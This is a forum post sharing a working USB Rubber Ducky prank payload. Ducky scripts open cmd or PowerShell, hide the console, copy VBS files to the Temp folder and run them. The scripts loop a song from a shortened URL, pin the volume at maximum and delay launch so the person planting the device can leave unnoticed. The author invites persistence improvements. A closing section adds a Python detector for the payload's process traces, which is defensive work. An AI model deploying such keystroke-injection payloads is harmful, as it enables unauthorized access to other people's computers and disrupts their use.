
Can't touch this


Sene0


I have found an old rickroll and modified it a little, similar to the exfiltration-of-documents payload here. It's made for a Rubber Ducky, but I guess it works just as well on the Bash Bunny. I haven't tried it on the Bunny yet, though.

You need your Ducky in twin duck mode, so it functions as STORAGE and HID. Name it "_" and then put the few files below on it. With the Ducky it works within a few seconds for me.

rick.vbs

# This file downloads a song from a given source. I just downloaded some songs from YouTube, uploaded them to a Dropbox and shortened the download link, to execute it maybe 1 ms faster. The example given here will download "Can't touch me".

While True
    Dim oPlayer
    Set oPlayer = CreateObject("WMPlayer.OCX")
    oPlayer.URL = "https://tinyurl.com/yyac7cx7"
    oPlayer.controls.play
    ' Wait until playback has finished, then start over
    While oPlayer.playState <> 1 ' 1 = Stopped
        WScript.Sleep 100
    Wend
    oPlayer.close
Wend

volup.vbs

# This file will constantly set the volume of the speakers to 100%. Even if the user tries to lower it, it will be raised to maximum again. It also slows down the user's interaction with the computer.

' &hAF is the virtual-key code VK_VOLUME_UP; sending it in a tight loop keeps the volume at maximum
Set WshShell = CreateObject("WScript.Shell")
Do
    WshShell.SendKeys(Chr(&hAF))
Loop

d.vbs

# This waits for a while so you can safely walk away and the computer doesn't start playing music while you're still at it, which would be suspicious. Then it executes the other two scripts and starts playing.

' Wait 10 seconds, then launch the other two scripts
WScript.Sleep 10000
CreateObject("WScript.Shell").Run "rick.vbs"
CreateObject("WScript.Shell").Run "volup.vbs"

And finally I have two versions of the payload.txt, one with cmd and the other with PowerShell.

payload_cmd.txt

REM Can't touch me
REM Target: Windows 10, Author: Sene0
REM Props to DarrenKitchen, bobflem
REM Starts cmd in 1 line with inverted colors
DELAY 2000
GUI r
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K mode con:cols=80 lines=1
ENTER
DELAY 200
STRING copy E:\*.vbs %tmp%
ENTER
DELAY 200
STRING %tmp%\d.vbs
ENTER
DELAY 200
ALT F4

payload_powershell.txt

REM Can't touch me
REM Target: Windows 10, Author: Sene0
DELAY 1000
GUI r
DELAY 100
STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.vbs')"
ENTER


If you want to stop the music from playing, you will have to sign out. That's the point where it could be improved: keep it running in the background even after the user signs out, or set it up as a startup process, similar to crontab on Linux.

I'm sure there's more to improve and I'd love to hear how.

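From the defensive side, the payload above leaves a few distinctive traces in process-creation telemetry: a script host running a .vbs out of the user's Temp directory, a cmd window shrunk to one line, and a PowerShell one-liner that resolves a volume by label to run a script from it. The following is an added example (not part of the original post) that scans constructed, Sysmon-style process records for those three patterns; the field names and sample values are my own simplification, not real log output.

```python
import re

# Constructed process-creation records, loosely modelled on Sysmon Event ID 1.
# Field names and values are assumptions made for this example, not real logs.
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\d.vbs",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"pid": 102, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /Q /D /T:7F /F:OFF /V:ON /K mode con:cols=80 lines=1",
     "parent": r"C:\Windows\explorer.exe"},
    {"pid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell \".((gwmi win32_volume -f 'label=''_''').Name+'d.vbs')\"",
     "parent": r"C:\Windows\explorer.exe"},
    {"pid": 104, "image": r"C:\Windows\System32\wscript.exe",   # benign admin script
     "cmdline": r"wscript.exe C:\Scripts\inventory.vbs",
     "parent": r"C:\Windows\System32\svchost.exe"},
]

# Each rule is (name, regex applied to the command line).
RULES = [
    ("script host launching .vbs from a Temp directory",
     re.compile(r"\\Temp\\[^\s\\]+\.vbs\b", re.IGNORECASE)),
    ("console window shrunk to a single line (hides the shell)",
     re.compile(r"mode\s+con\S*\s+.*lines=1\b", re.IGNORECASE)),
    ("PowerShell resolving a volume by label to run a script from it",
     re.compile(r"win32_volume.*label=.*\.vbs", re.IGNORECASE)),
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def matches(event):
    """Return the names of all rules that fire on one event."""
    hits = []
    image = event["image"].lower()
    for name, pattern in RULES:
        if not pattern.search(event["cmdline"]):
            continue
        # The Temp rule only matters when the process is a Windows script host.
        if name.startswith("script host") and not image.endswith(SCRIPT_HOSTS):
            continue
        hits.append(name)
    return hits

def scan(events):
    """Map pid -> list of rule names, for events that triggered at least one rule."""
    return {e["pid"]: hits for e in events if (hits := matches(e))}

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

In a real deployment the same regexes translate directly into a SIEM or Sysmon rule on the CommandLine field; the Temp-directory rule will need tuning for environments that legitimately run scripts from there.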
